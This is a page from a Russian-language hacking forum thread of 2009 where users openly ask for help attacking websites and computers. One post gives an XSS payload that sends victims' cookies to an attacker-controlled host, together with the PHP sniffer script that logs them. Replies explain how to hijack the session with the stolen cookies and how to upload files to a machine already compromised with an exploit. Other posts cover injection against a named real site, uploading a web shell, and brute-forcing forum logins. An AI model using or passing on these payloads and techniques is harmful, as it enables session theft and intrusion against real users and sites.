Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    наверно таки у них пароли одинаковые) будто бы какой-то неоригинальный реггер заюзали
     
  2. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Это чтото типа соли. токо для логина. короче лучше ставь себе этот двиг на машину и ковыряйся и разбирайся
     
  3. kiddie

    kiddie New Member

    Joined:
    15 Jul 2009
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Подскажите, на снифер приходят такого рода данные
    com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH=25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
    благодаря xss на уязвимом сайте , тобиш тело письма такое
    HTML:
    <script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
    код снифа :
    PHP:
    <?  $query $_SERVER['QUERY_STRING'];  $query .= "\n";  $db="cookies.txt";  $fh=fopen ($db"a+");  fputs ($fh"$query");  fclose ($fh);  ?>
    что обозначают полученные данные, тоесть что приходит...?
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25

    Так точно,сержант Витя )У мя от нижеприведённого сплойта сознание уплывает)Ну что ж,попробую чтоли : Р
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    $_SERVER['QUERY_STRING']
     
  6. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае

    ЗЫ с меня +
     
  7. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    :( это мой друг к тебе пришли куки (Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. © ru.wikipedia.org)
    Теперь твоя задача, подменить на полученные данные, свои. А сделать это можно следующим образом:
    1. Mozilla Firefox - при помощи плагина: Add N Edit Cookies
    2. Opera - следующей манипуляцией: "Инструменты -> Дополнительно -> Управление cookies..."
     
  8. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    через ftp
    http://cmdhelp.ru/index.php?cmd=ftp
     
    #8248 xa-xa89, 30 Jul 2009
    Last edited: 30 Jul 2009
  9. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    Code:
    POST /process.wget_upload.php HTTP/1.0
    Host: oneclicktube.com
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
    Content-Type: application/x-www-form-urlencoded
    Content-length: 214
    Connection: Close
    
    title=&keywords=Mr%2E&[email protected]&[email protected]&[email protected]&[email protected]&url=dds'&button=Reset&submit=Upload&
    
    Блинд вроде...но и как блинд не хочет раскручиваться(
     
    #8249 DeepXhadow, 30 Jul 2009
    Last edited by a moderator: 30 Jul 2009
  10. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Как руками определить версию сервера и название сервера.
    Я посылаю кривой пакет и иногда в ошибке есть имя и даже иногда версия сервера. Есть ли другие методы определения? И может есть какиенить спец пакеты на которые веб сервер так ругнется что всегда будет название в ошибке? И как определяет хспайдер?
     
  11. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Code:
    [The_HuliGun@server]$ nc edu.mail.ru 80
    HEAD / HTTP/1.0
    
    HTTP/1.1 302 Found
    Server: nginx/0.6.31
    Date: Thu, 30 Jul 2009 14:34:34 GMT
    Content-Type: text/html; charset=iso-8859-1
    Connection: close
    Location: http://edu.mail.ru/cgi-bin/index.cgi
    
    
     
    1 person likes this.
  12. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Нето...Нада не прибегая к другим программам
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Krist_ALL Что значит "руками" ? Пощупав его что-ли? Попробуй сформулировать вопрос нормально, что тебе нужно

    Ты пакет экспресс почтой что-ли посылаешь?
     
    #8253 Kakoytoxaker, 30 Jul 2009
    Last edited: 30 Jul 2009
  14. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Не прибегая к сканеру
     
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Krist_ALL
    Я тя не понял. Часто, при ошибках сервера вылетает ошибку и внизу версия Апача и т.д... Как вызвать? site.ru/[несущетсвующая дира]... Если не правильно понял, то задай нормально вопрос.
     
  16. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    В 404 ошибке не всегда е инфа о сервере. Нада как то еще узнать.Как сканеры определяют?
     
  17. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    В HTTP-ответе сервера (заголовки Server, X-Powered-By):
    Code:
    HTTP/1.1 200 OK
    Date: Thu, 30 Jul 2009 17:51:04 GMT
    Server: Apache/2.2.6 (Fedora)
    X-Powered-By: PHP/5.1.6
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 16505
     
  18. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    Как залить шел на mybb имея админку??? все мозга уничтожил (((
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/thread27777.html
     
  20. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Доброе утро.
    Пробегялся я брутом подному форуму.
    И заметил одну вещ, есть
    NICK: slot
    Pаsswd: 00
    Но дело в том , что можно войти и таким поролем 000, т.е. если в пароле одни "нули", то длина пароля не имеет значене. Токое происходит только с нулями.
    Это какойто баг?
    И возможно ли что нибуть поиметь с этого?
     
    #8260 SeNaP, 31 Jul 2009
    Last edited: 31 Jul 2009
Thread Status:
Not open for further replies.